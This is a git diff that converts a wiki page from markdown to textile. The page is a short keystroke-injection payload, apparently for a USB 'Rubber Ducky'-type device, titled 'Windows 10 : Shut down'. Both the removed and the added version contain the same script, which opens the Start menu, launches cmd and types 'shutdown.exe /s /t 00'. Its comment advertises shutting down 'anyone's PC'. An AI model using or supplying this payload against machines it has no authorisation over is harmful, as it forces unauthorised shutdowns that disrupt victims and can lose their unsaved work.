diff --git a/Payload---Windows-10-:-Shut-down.md b/Payload---Windows-10-:-Shut-down.md deleted file mode 100644 index 33738c6..0000000 --- a/Payload---Windows-10-:-Shut-down.md +++ /dev/null @@ -1,7 +0,0 @@ -* REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code. -* CONTROL ESCAPE -* DELAY 400 -* STRING cmd -* DELAY 200 -* STRING shutdown.exe /s /t 00 -* ENTER diff --git a/Payload---Windows-10-:-Shut-down.textile b/Payload---Windows-10-:-Shut-down.textile new file mode 100644 index 0000000..d3c238c --- /dev/null +++ b/Payload---Windows-10-:-Shut-down.textile @@ -0,0 +1,7 @@ +REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code. +CONTROL ESCAPE +DELAY 400 +STRING cmd +DELAY 200 +STRING shutdown.exe /s /t 00 +ENTER